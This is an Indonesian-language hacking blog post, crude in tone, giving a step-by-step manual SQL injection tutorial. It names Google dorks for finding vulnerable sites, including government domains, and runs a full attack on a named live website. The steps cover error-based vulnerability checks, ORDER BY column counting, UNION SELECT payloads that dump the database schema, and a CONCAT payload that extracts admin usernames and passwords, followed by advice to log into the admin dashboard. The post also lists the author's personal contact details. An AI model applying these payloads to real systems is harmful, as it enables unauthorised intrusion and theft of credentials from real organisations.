SQL Injection

Assalamualaikum 
Bertemu lagi dengan gw 05•B|_|C1N ge disini bakalan kasih tutor tentang SQL manual ea
Jan lupa pake 
Oke tanpa banyak bacod kita langsung aja dah seperti judul diatas gw bakalan kasih tutor tentang tentang SQL Injection
Ini tutor SQL injection dari gw yah ngentod, Ini Tutor khusus yg blum tau ea , mastah minggir dulu:v

Pertama, ngedork dulu ea
Nih gw kasih dork nya
inurl:product.php?
Inurl:game.php?
Inurl:index.php? Site "go.id" 
Selebihnya gunain otak wibu kalian:v

1. Masukin dork ke gugel, terus search
    Disini gw kasih live targetnya ea

2. Buka salah satu site nya, cek vuln atau kaga, Cara cek vuln, kasih string atau quote.. ( ' )
Jika vuln akan ada tulisan 
You have an error' in your SQL syntax
Atau ada kalimat yang mengilang

Contoh dari live target tadi es

Kalo site jadi error berarti vuln, lanjut step ke 3

3. masukin order by
http://www.pdpersi.co.id/content/pd_events.php?=13+order+by+1--+-
http://www.pdpersi.co.id/content/pd_events.php?=13+order+by+2--+-
http://www.pdpersi.co.id/content/pd_events.php?=13+order+by+3--+-
Dst sampe ketemu error nya
Disini eror nya di angka 6




4.Misal, error di 
http://www.pdpersi.co.id/content/pd_events.php?=13+order+by+6--+-
(berarti column nya ada 5)

5. Karna column ada 5, kasih union select sampe 5 jangan lebih bego
Contoh:

http://www.pdpersi.co.id/content/pd_events.php?=-13+union+select+1,2,3,4,5--+-
Nih jadinya nanti



jangan lupa kasih - di sebelum parameter nah nanti muncul deh angka togel nya langsung bawa ke bandar togel aja gan:v

Cuss lagi kyta gan

6. Kalian inject database dari angka yang muncul, disitu ada angka 2,5 pilih salah satu aja kalo mau semuanya juga gak pp kok:v
Sekarang kita masukan inject nya

,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)

Jadinya kek gini nih

http://www.pdpersi.co.id/content/pd_events.php?catid=-13+union+select+1,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),3,4,5--+-

7. Taraaaaaaaaaa muncul database nya :v
Cariin tuh user and pass adminnya

Gak kelihatan?
Pake kacamata yang tebel:v

8. Nah Jika Sudah Lihat, Kalian Tinggal Dump istilahnya, Atau Buka Table Caranya Dengan Masukan Inject :

(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(Nama Tabelnya)WHERE(@x)IN(@x:=CONCAT(0x20,@x, user,pass,0x3c62723e))))x)


Disini user dan password gua di admin dan nama table adminnya loginname dan passwordnya password Jadi kalian edit inject nya jadi kek gini :

(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(admin)WHERE(@x)IN(@x:=CONCAT(0x20,@x,loginname,password,0x3c62723e))))x)

Nah nanti jadinya kek gini :

http://www.pdpersi.co.id/content/pd_events.php?catid=-13+union+select+1,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(admin)WHERE(@x)IN(@x:=CONCAT(0x20,@x,loginname,password,0x3c62723e))))x),3,4,5--+-

Nanti Saat kalian Buka ,Akan Muncul tuh user + password .
Lalu kalian tinggal nyari admin login nya ea , biasanya adlog nya di
/admin/login.php
Kalo itu gak ketemu pake adfin online ae

Kalo dah masuk dasboard admin terserah ea mau lu apain ea, masa iya mau tanya lagi ajg
Sekian dari gw jika ada salah saya minta maaf karena gw juga masih pemula gan ,
Jangan lupa juga kunjungi blog team saya
https://crotdiluar.blogspot.com/?m=1
 kalo kurang jelas bisa hubungi gw
https://wa.me/+6287715333797
Atau
bucinhae@gmail.com

BUC1N Hanya seorang otaku yang gemar dengan it

2 Responses to "SQL Injection"

Iklan Tengah Artikel 2